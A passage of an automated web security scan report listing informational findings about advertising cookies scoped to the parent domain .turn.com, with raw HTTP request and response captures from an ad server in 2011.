Fd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=17007146&cch=17007159&code=17009760&l=300x250&aid=26342010&ahcid=1531046&bimpd=w267z5110-9lCkCiWdsYSV7sjmP2vZics1lAC4XhKUfb4kL0Ncw8VXNyAV_be8l5SHeXp-hmZKD4RpSjvqOdG21o7MsysEszRVcBDJIalIkcyfcPYGdiivpMVVSAGujp5Eawc7gLk_EilyoyuMPUoPTcx0iQ7pkfLORb9M9xD2FUeC0wDTfA5mvCssGb3HrKdxRTD-jqIL-v0YTzBWu_RokSebFQIMeJJviX87ikSix9ALRMgCaT0lzBRmv2sayVeoUUyR5eECeK9oawV_Z1eCi6tZC4nl9TvPom1PzOgGawtj3ie9632RT2m6tP27U9VCTO0Z9qNlkaHSu_VCqQOhlNRVFDjU5ZPYLM1pjPT4UggfEbVGXBgYobQGfbbdicpaoKA-dGnIDVsiTG_g96RNlq_zeeNdeFcq4oFJRsDcuSn4_qc9btE5vDu1TqevbQmiRauhE9MEviof26QZBwgtmyu_XeZQTM0Y5XRGWekIAl6aeGF6TADpa--Qg5xiWTbDGCq9dVoD3OClkdQUStaHewv1pRAeIFVZ-iMQ-tUT2DENyJrUdac3HvIx7P6cw_vfBz5xDsVEqchMpjM7fNhUkeamWhz6Jchpm_0zqK4gHhysz5NY-NvflAxBiZOOJStYS6nlnxtND_oAWqhGuJS-RwKhhRT6kRg9Ghb1H3mX02ibIJMy03hgdmmQTrNl6RMGvMg1hhDuP_7RzXq5wKDQCqQzeglsazfw-kFnFBMAlP2swrszR321kqEYVzyCBN1x0nzkrk9isQgxKCLtC5KT0eNAVlx2_cypz-tDXFNnQESrjXxNhaCYm_Kc00u342slyHQEDQxxIZ5WyOVdTz2nrlxRM2H1Qjs8vHgR3oeWT0BYUtCefE4mCGdr4rPFcR&acp=2.125 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=VFcpPgn_cpKK3X6-DBzQrG8p5t-lSS9QrIN8_Ikw5xq76nVUEQrqCfHGx7lLD55e4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6fVMpRA9COvxPm9GhrTVpFKY3wNFHSUK3iiGIQHqnzJV0MIbZunpXXlvCAOxMl-e2mOWXDKU-e0jQQWwXZ_KA4rp-gEcEU_z3fHlUKh48CElelynrVX8L3tctyWPQ981d4NAhFLWmqmeQHdY0bEBb7dxSnhDIs_KwpduTdbUrdnD5ptdEK9Zd4VFLf5b7E965eEWSgRAJMjcwh1Rnoetm6asNA2mupPotO89J1M7GQCehgfp82PH_67bvwY8AcKWtpVTn8RJ7mxz0Qq-4dX947581dnOBqEIp9UcyJdU0s2e8jQ6I4yQP6oR0TOc8xjRbDyDUfzSD4FrO8H9TmnOs2BeL0zEiugUM9OqWhQZB7yPBE4pmNswr1W7JJQ9nnzHhvKy6CLrBwA26q3rKIUSyrp69AW6WXQR5fh2uY3qjRVIR2cbH9dvHWGtlfgkfnduUJ7-LecmD2mOyBX41nCauHOGWvmtzmGSx0c2o_oWNTEDS6UvXehm_3oihE0LGnKL6A2zovzUc76Tv1dBxqAuUWJ2yabgWp9RGV2achzxJ6rT5r4uDqerOaDdD0wwngxQCuxR4GzxwP2Gp7zDKJVZzwk6OkOj3ijoT118BWRgxVdorK2BC3rm5PZPXWmAUZttveUUWtgzEFZCKRxXCGt3hE-GfnPUEZXPiZoI4HhxYEnuMdkwRFNf-PFYuhRzd7WaCcThyEJpdc7UA-lDT_VaNoCw6dKqgsNXxK32spv_pBqUtBKrurHWTm9yF4isrm0q1XzJlXPQXwgNTrx9csDxq9_jIOnqqzRzUuy2XqJJ99SI2KJF3hRYbUm9g5BvqA_dHDHbiOTdoPp9mk_zP0HFzIDtc60VezBVRFoY17QfD324cEs3dnlPnlwwlV5wK9w2QGXNhVfoGObVdA9ZGN5tWQE80PRbtnTibG2CTvmpnyKaw03yilIfARYzTpyP_ZDutPAcC5DJhAKPPZjlpiJrzFiANAYkv0OEoYBDIYN9tcog3ggyPaM-HP56M3cxRTtjuJ45hsM5fAq0Kv5eWO5WH9FLG_cUN0GCqWdGyPQBGcPPcXT_4-zpZe9hdpT8rHJgrknf6_9NTuJgibgAJLwPhjVfQPrqBowoo6pNvNadckM4ltfMe_svYmbaDqwgWd3Z2Wk5eUCHlHXybWaIP9xBJDVpOXlAh5R18m1miD_cQSQ01LdqO0h0nfyzqpKjeg68NNS3ajtIdJ38s6qSo3oOvDdcbu4N6_1Mf_8mBSIHEAygy4e2nwwvq--ToVtQnVc_zMuHtp8ML6vvk6FbUJ1XP8zLh7afDC-r75OhW1CdVz_My4e2nwwvq--ToVtQnVc_zMuHtp8ML6vvk6FbUJ1XP81r2b1CGQW7EihA8hXYRzFnrrmfXkz5S6LZqcUyBOxLxxJF2piBoNUiQ4YhuXcEvsT8Q2qBoT1L3ai3yyG9LNTV31RaGRYNHxJLQ0KMAbL_YbV7UY-lf8Cy2-WEH5yKqm21e1GPpX_AstvlhB-ciqpttXtRj6V_wLLb5YQfnIqqbbV7UY-lf8Cy2-WEH5yKqm21e1GPpX_AstvlhB-ciqpt4OZL_J9nreqUEAQmmGZRLIl2iRW0GF05xt9mAqdcgM8ikeD-Jsgrqg0wjFj5eworIpHg_ibIK6oNMIxY-XsKKyKR4P4myCuqDTCMWPl7CisikeD-Jsgrqg0wjFj5eworLrow8ay48a7J13KfbIzOlyxO6Qo_88_z_jZS6AMOdx313sYI3QnWZLgOnrhfNkOp9d7GCN0J1mS4Dp64XzZDq8MmmQLgStIi-0QecSOXzN2rBXPh_pcAOQviT09vYOhW3vAqPBV-PmRDllg8-dGfnPrvyBHWqLrluXMnv06N3tBC1u5H0b8UlmxkRvNsg2B8XWbDHh68f4Ez4UT1LcxhZF1mwx4evH-BM-FE9S3MYWRdZsMeHrx_gTPhRPUtzGFljFhLZuOghqIgHJBlOTFBDGwS5Ufge9JHPDk8jovx6jxsEuVH4HvSRzw5PI6L8eo8bBLlR-B70kc8OTyOi_HqP889YayVDREt24Yf3Rs87_-RQfjLPj8Qqv9xhe3smLdofT198_1G_6tw2tYJByD78pMmWVqJQ7LMAl6wO3pr4O-Cj4qrocPg3HjMtFMcWXJfgo-Kq6HD4Nx4zLRTHFlyX4KPiquhw-DceMy0UxxZcl_pKlxdgrKMp_g_mhc-u4v_gqr17D3YnZZj0VEnb3qlX; fc=1HwY5eF6vpQdaZr0VKijbOmFq4cNXbBciLKcKOwCGRKTjSrIfgukt7kAV3wXaDgwmNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rSh-JVpE91skvrTv5YbbzdPP2fUTWiuleHM2TNevFkuFbJu6PIvB7Kyh_Y-Z0Ar49MVNxQJ81RLhxavpnpDeVwkA; rv=1; rrs=6%7C9%7C1002%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C1001%7C1004; rds=15116%7C15110%7C15128%7C15110%7C15110%7C15112%7C15110%7C15110%7C15116%7C15110%7C15115%7C15110%7C15110%7C15110; uid=4325897289836481830; pf=4pdz9HqQvAJPc_fEmHEvfYtyhw3WCfffixhSyve9SHMdCPfTl6GVwLxMGMWABO2H8in0ufb0E7B95yrOVA9gi7Mm4306x4iI_gVgxycj0XjyzKimGqsD0iB4nMRqsP7FGV2kmceb_A02r61L9L2x_LQOiMbi_3ht1paqlZLZAIG41x8WOeG1d1YT8LqYxujWpaNrrrmVIGEVk2vKcGW5T_VqtbfwzON8N47nNCSiPYswv6-UtHU7yiBKV92FtepiMzMPedCGc-8-2nH2872uRtawe7vJ40L92BQJDrPQJlLb5IcGwCFOSU3eIa02dnaMG-q9hhFkwEyxnJia7rrNw0lXx5AGfqwlTiv6Oh6k-MkD0-QqnOcoIMFELq-TfgINPeG8ThFo1fQBFPg-IRK7X_RhJnJryT2Mg5ro1MESkHXfo8rYidOY42JGSZ8QQ39rb216XSSAqaMGOBrW9HW0JuonwITMtmQXVJwJZBhw246x1renGly_ijfsnOaD_xX_UIfEoNg-rpDhmTWL_lke_29OHgSkW-Qyo7Eq8x5aQXs7tnz8b5XSaSHGJ0IWdmnRE_Fc47RbhGeBW910U0it8TV8CeRjTFQ0URiH7X0Ip2h_UwFZWBYw-AnNTpdI2ylkigS8DIjQfN6r-tLWF6bmSrFCfaTpXanhVq1SXdiIJimOrwU2C1CGjh827tzoxA8d6MAz0zxieJFPPGHCVH6SrM_8_I10GFeh3QcgDL5jed37CC2pZY7HhE8P_3zNwZJyMZyidB_PKMdsaLhLARMGbw5TwXWitBywSZyvOUv6KcS3ty96HP_VqUNj0w90hbSFQLR3fnbun5fp78RA-KiOAoFfEjBvX5bQj-Uuooi16eY_JwjgVd5A_7urhSpZPoxHE_RAu3wulbwzzMNojuQ9iRFJpT0t-dILvqN9NeJANN-dQxzAyqfrO8Sa2jD6PSlUNSXN2NR11g3mQK5JwSrfwxHeem52EVd-aFT_w1BdfD5V5JRXDzlRclT8rO51BpLJWFxDKmCIATY_RHS9hBu-s4OU2qZ4Vr3wNCnrWjrGcRHhT7QU7n8yscjtvg8sUnToHULSTxclR_-y5Kz4i1l4sVL2K9fegPyWtWm6Tydgg36qb8wIAA0b3hMPT2J0uPCG5d65ZQtigKwuBIvFSsUFeLuPoJzcdsde3PfRDoxJC9AwMPO6a5rcfT6Tcr54gfYes0KLChTx4AvrcBnUrAMeDZtSXWV7ol0FbZmRsGEoP-ga2WcE34x1PtZyAqAtO9PMBGtZ4EnIRJvAbsvB6FiDJzUdNf4MZNZ5-qNo6GgQG49-ZhPb040AgQ7ShvtXSg7eEzxlX5Mk32ywZv5B-n2ZD3PgsP4_X9we7SK3BV3pPDtPb8XIKgZGoB8bk0WolEFzDAUvJ2Ejg6hsDoO9roHJoKROCqyjEKeFz1jh7EASlOskzZvcPtFjHtDPh3_B0mlJ_l1lncvpD0ZK_lZUHG-gR-HwgDe5HucJrpmOzF_jWwklXNMYMkzwTT6LDhxIaz-v8Sdu3lrDXkodkcabuUZUJw

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 15 Jun 2011 11:02:07 GMT
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Cwq2GXGZMei0H6QRLFUWcgEzref2sQrvavFxeBByhwbG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6fVMpRA9COvxPm9GhrTVpFEJedvFh7IcKMPUZKG4a25Wjp4-4VHiVBWhL8kZTTHUEEZYjqWmNkbYMJXxYwXP0ivAhMyG7WiBdMtmZpxmib65elynrVX8L3tctyWPQ981dRhSgyH_YKyzwaHs2OOwPKnlcd_rDI1guq3jW_XwqTcptUMsF14GuE97T3OQgmtAND1aJVVaBwrOt4alj6Rzt3asNA2mupPotO89J1M7GQCdYA6mZQORv9NCOuHD8W8Pvw2E0XpC8MoXcUC9EvLIqDJ81dnOBqEIp9UcyJdU0s2dZNadKv1nmwVh0nQMBiUozDyDUfzSD4FrO8H9TmnOs2Fy1WnPRG1FVm_158R84SQUDDvn5qzXJjLZ8wMOpH2VUidMby9e0xx7EjmD_qe07bBW51WNe_vXSrH8j3OikfOix0YnsBLVPpvnCKqaSleld2e3m3LW2izkTUCvyig6f_Eclre2oYPrXXUlbckOsOzfRHfKboHgAiyeCSD5Se3Dt56JQiT9BBtDU5zYNi_NmUreJTf9EU_tOkHRKVO8_mZbQn_ugqOPPFtBuaLGREhiwAxwF5V3jVoK_k0gd7-0t-3eGamYwoDBKdRj9ba9srGKI4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIVYDsGs8HA9ebgXcdSEZwfKe3Y57IiZneII5Ka6gzHwRfJJa1hX06djW9VmjlVrjyXySWtYV9OnY1vVZo5Va48l8klrWFfTp2Nb1WaOVWuPLF4I5dA1vXKb0IGHGC-Ole5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4iS8drDvH2GHnX7T1P8D_iX1ra1gA5Wy-ov38a7zRUR_Fn3VEss7RQ9Tyo1qT5AwESaWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: fc=GNnbBD3qiHnaSVYBbCSNLvLBUhuH6wslcqkNHBZUaKb7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rS1aeprWaIP6vaZTV9xdfPWhdQ9SbRVPlctyZfmBFwploXR8qslufNm6r8H5hh1jnufuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:02:06 GMT
Content-Length: 10252

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...

12.33. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=-7D3jhve-_dqBXor_KGJlXkh6uMLiJASzHFQS38JXoTG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ9aseWXXyEg6ngdmdtCJ98TaaCzQk38mLAksW0DqSbPYbySfUM3MRmwu87R_bnrJOV4gv5uh11F4sQPDcy793aXQyWberVE7H9dGuTlyTFp3RaUANT5eBsokdVPtiFhbZlnsCNKZNegbrth_D7SWf8-GRakhudMFH92bLqvo7whZCttHGvuJqzUmN3TCnRRWA9RzbA2m8y8-md7vvpCypQN__nnhKkgreG7OSDcaZV8DtILSxhIqj1_8W_b-sPL2rmo28BWvcjGNUxT50RKm6bHeo49rmT7jj-OFCxy7LUUTGOKwgYTlqkzoPyBtxx8IAv5QN-B4qn85KrWNXkRxjrbOKBw1n7GMckFqA6EpnplKzaOHG6TZ2deht-u0YLfBKH6Pa-p1gEeo6-aXDdZFMAmjhzhGEdbwvglvH0-24dOZTOW2rPb1SgA4pngxLGaQQtnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlLz4BQlJ6csz8dB0J_8c8Ka0J_7oKjjzxbQbmixkRIYsAMcBeVd41aCv5NIHe_tLft3hmpmMKAwSnUY_W2vbKxi5DYHhi24I8waLdyGYBf3-MaTnGr8K_HGinZrBfbZveONlgZZNIb4imigs__tVs5_-ofKtZ6hXXSZpdwBNj6GJboI-S1pQlAm9WAm2qWReCcDoZ7E02XMENjv3ClnVh50sfKj_XnOycnqr1f-q8U8AE4G03BTk0fzq7l2lZkr8VkAgj7Wkf7Z-tgLIpA1wB2yzoRrgUiaRdOvE17AKUsymItYwTHyhwXAUBXi6D6PqPXyEGeO1Zz6qPU8NhJ7wMtVPQFf5dsx4yIMgZcA57lrmBiIHuEACwgcsGnk3f55POjRgsWdgnGrl2gT_wrbiSH9GS32-3vC2xqxP7e5vHxFUGj7jmQul9hhXiSWuClGE3RPf0vY5j10d73GHcIzZGN7ew5Q1a2Jatefo_kPZe9ev4zG24J2Kc93KYfJqWJL5G-XhStGducGUCpASNzOmiggs84qnGaLTJJhRTIpFjT7WIs2Qp4sZFseTH4XqopbjkCcflfgayr40dr4ggTgLxRYlq-sDEfjhI0bEAhsL4dT5tAwWq2UVacc2NOW6nmLabkc3sJNc7e1BoJUkxklm2VAglnp_rMWjHAhM9k1KaSm8OWsPIHPqgUorS3S